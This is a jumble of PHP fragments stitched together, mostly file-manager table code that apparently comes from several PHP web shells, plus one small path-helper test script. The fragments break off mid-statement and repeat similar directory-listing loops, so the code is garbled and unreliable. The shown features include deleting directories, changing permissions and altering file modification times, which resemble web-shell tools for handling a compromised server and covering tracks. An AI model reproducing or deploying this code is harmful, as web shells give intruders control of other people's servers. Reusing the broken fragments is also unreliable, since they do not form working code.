$thisbg = bg(); p('<tr class="' . $thisbg . '" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'' . $thisbg . '\';">'); p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>'); p('<td><a href="javascript:godir(\'' . $dirdb['server_link'] . '\');">' . $dirdb['filename'] . '</a></td>'); p('<td nowrap>' . $dirdb['mtime'] . '</td>'); p('<td nowrap>' . $attachsize . '</td>'); p('<td nowrap>'); p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirchmod'] . '</a> / '); p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirperm'] . '</a>' . $dirdb['fileowner'] . '</td>'); p('<td nowrap><a href="javascript:dofile(\'deldir\',\'' . $dirdb['server_link'] . '\',\'Are you sure will delete <' . $dirdb['filename'] . '>? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\'' . $dirdb['server_link'] . '\');">Rename</a></td>'); p('</tr>'); $dir_i++; } else { if ($dirdb['filename'] == '..') { p('<tr class=' . bg() . '>'); p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\'' . getUpPath($nowpath) . '\');">Parent Directory</a></td>'); p('</tr>'); } } } p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>'); p('<form id="filelist" name="filelist" action="' . $self . '" method="post">'); makehide('action', 'file'); makehide('thefile'); makehide('doing'); makehide('dir', $nowpath); $file_i = '0'; foreach ($filedata as $key => $filedb) { if ($filedb['filename'] != '..' && $filedb['filename'] != '.') { $fileurl = str_replace($_SERVER["DOCUMENT_ROOT"], '', $filedb['server_link']); $thisbg = bg();
$thisbg = bg(); p('<tr class="' . $thisbg . '" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'' . $thisbg . '\';">'); p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="' . $dirdb['server_link'] . '"></td>'); p('<td><a href="javascript:godir(\'' . $dirdb['server_link'] . '\');">' . $dirdb['filename'] . '</a></td>'); p('<td nowrap><a href="javascript:opfile(\'newtime\',\'' . $dirdb['server_link'] . '\',\'' . $dirdb['dirlink'] . '\');">' . $dirdb['mtime'] . '</a></td>'); p('<td nowrap>' . $attachsize . '</td>'); p('<td nowrap>'); p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirchmod'] . '</a> / '); p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirperm'] . '</a>' . $dirdb['fileowner'] . '</td>'); p('<td nowrap><a href="javascript:rename(\'' . $dirdb['server_link'] . '\');">Rename</a></td>'); p('</tr>'); $dir_i++; } else { if ($dirdb['filename'] == '..') { p('<tr class=' . bg() . '>'); p('<td align="center">-</td><td nowrap colspan="5"><a href="javascript:godir(\'' . getUpPath($nowpath) . '\');">Parent Directory</a></td>'); p('</tr>'); } } } p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>'); $file_i = '0'; foreach ($filedata as $key => $filedb) { if ($filedb['filename'] != '..' && $filedb['filename'] != '.') { $fileurl = str_replace($_SERVER["DOCUMENT_ROOT"], '', $filedb['server_link']); $thisbg = bg(); p('<tr class="' . $thisbg . '" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'' . $thisbg . '\';">'); p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="' . $filedb['server_link'] . '"></td>'); p('<td>' . (strpos($filedb['server_link'], $_SERVER["DOCUMENT_ROOT"]) !== false ? '<a href="' . $fileurl . '" target="_blank">' . $filedb['filename'] . '</a>' : $filedb['filename']) . '</td>'); p('<td nowrap><a href="javascript:opfile(\'newtime\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">' . $filedb['mtime'] . '</a></td>'); p('<td nowrap>' . $filedb['size'] . '</td>');
$filedata[] = $file; } } } //TODO syslinks } closedir($res); natcasesort($dirdata); natcasesort($filedata); } } else { $sBuff .= sDialog(tText('accessdenied', 'Access denied')); } } $sBuff .= '<table id="sort" class="explore sortable"> <thead><tr data-path="' . getUpPath($currentdir) . '" class="alt1"> <td class="alt1 sorttable_nosort">' . mLink('<div class="image lnk"></div>', 'godir(this, false)') . '</td> <td class="touch" width="70%"><b>' . tText('name', 'Name') . '</b></td> <td class="touch"><b>' . tText('date', 'Date') . '</b></td> <td class="touch"><b>' . tText('size', 'Size') . '</b></td> ' . (!$isWIN ? '<td><b>' . tText('chmodchown', 'Chmod/Chown') . '</b></td>' : '') . ' <td width="120px"><b>' . tText('actions', 'Actions') . '</b></td> </tr></thead> <tbody>'; $bg = 2; foreach ($dirdata as $file) { $sBuff .= '<tr data-path="' . $file . DS . '" class="' . ($bg++ % 2 == 0 ? 'alt1' : 'alt2') . '"> <td><input type="checkbox" value="' . $file . DS . '" name="dl[]"></td> <td><div class="image dir"></div><a href="#" onclick="godir(this, true);return false;">' . $file . '</a></td> <td><a href="#" onclick="showUI(\'mdate\', this);return false;">' . date($config['datetime'], filemtime($currentdir . $file)) . '</a></td> <td><a href="#" onclick="viewSize(this);return false;">[?]</a></td>
$filedb['chmod'] = getChmod($filepath); $filedb['perm'] = PermsColor($filepath); $filedb['owner'] = getUser($filepath); $filedb['link'] = $filepath; $filedata[] = $filedb; } } unset($dirdb); unset($filedb); } } $dir_i = '0'; if (isset($dirdata['up'])) { $thisbg = bg(); p('<tr class="' . $thisbg . '" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'' . $thisbg . '\';">'); p('<td align="center">-</td><td nowrap colspan="5"><a href="javascript:g(\'file\',\'' . getUpPath($cwd) . '\');">Parent Directory</a></td>'); p('</tr>'); } unset($dirdata['up']); usort($dirdata, 'cmp'); usort($filedata, 'cmp'); foreach ($dirdata as $key => $dirdb) { if ($p1 == 'getsize' && $p2 == $dirdb['filename']) { $attachsize = dirsize($p2); $attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown'; } else { $attachsize = '<a href="javascript:g(\'file\', null, \'getsize\', \'' . $dirdb['filename'] . '\');">Stat</a>'; } $thisbg = bg(); p('<tr class="' . $thisbg . '" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'' . $thisbg . '\';">'); p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="' . $dirdb['filename'] . '"></td>');
<?php /** * Created by PhpStorm. * User: abcdlzy * Date: 15/2/14 * Time: 下午6:17 */ function getUpPath($cwd) { $pathdb = explode('/', $cwd); $num = count($pathdb); if ($num > 2) { unset($pathdb[$num - 1]); } $uppath = implode('/', $pathdb) . '/'; $uppath = str_replace('//', '/', $uppath); return $uppath; } echo getUpPath('/Users/abcdlzy/Documents/GDWeb/CA/1151220136/Data');
unset($pathdb[$num - 1], $pathdb[$num - 2]); } $uppath = implode('/', $pathdb) . '/'; $uppath = str_replace('//', '/', $uppath); return $uppath; } echo "<table cellpadding=1 cellspacing=1 boarder=0 bgcolor='#E4E4E4' width='40%'><tr><td bgcolor='#dddddd' height='25' align='center'> </td><td bgcolor='#dddddd' height='25' align='center'> </td></tr></tr>"; $files = getFiles($path); foreach ($files as $file) { if ($file[type] == "dir") { if ($file[name] == '..') { $tpath = getUpPath($path); } else { if ($file[name] == '.') { $file[name] = '..'; $tpath = getUpPath($path); } else { $tpath = $path . $file[name]; } } $value = substr($tpath, strlen($tpath) - 1, strlen($tpath)); if ($value == '/') { $tpath = substr($tpath, 0, strlen($tpath) - 1); } print "<tr><td bgcolor='#cccccc' height='25'><a href={$PHP_SELF}?dir={$tpath}&msg=viewer>" . $file[name] . "</a></td><td bgcolor='#cccccc' height='25' align='center'> " . $file['per'] . "</td></tr>"; } else { print "<tr onMouseOver=this.style.backgroundColor='#fff3cf' onMouseOut=this.style.backgroundColor=''><td bgcolor='#FFFFFF' height='25'>" . $file[name] . "</td><td bgcolor='#DDDDDD' height='25' align='center'> " . $file['per'] . "</td></tr>"; } } echo "</table>"; ?>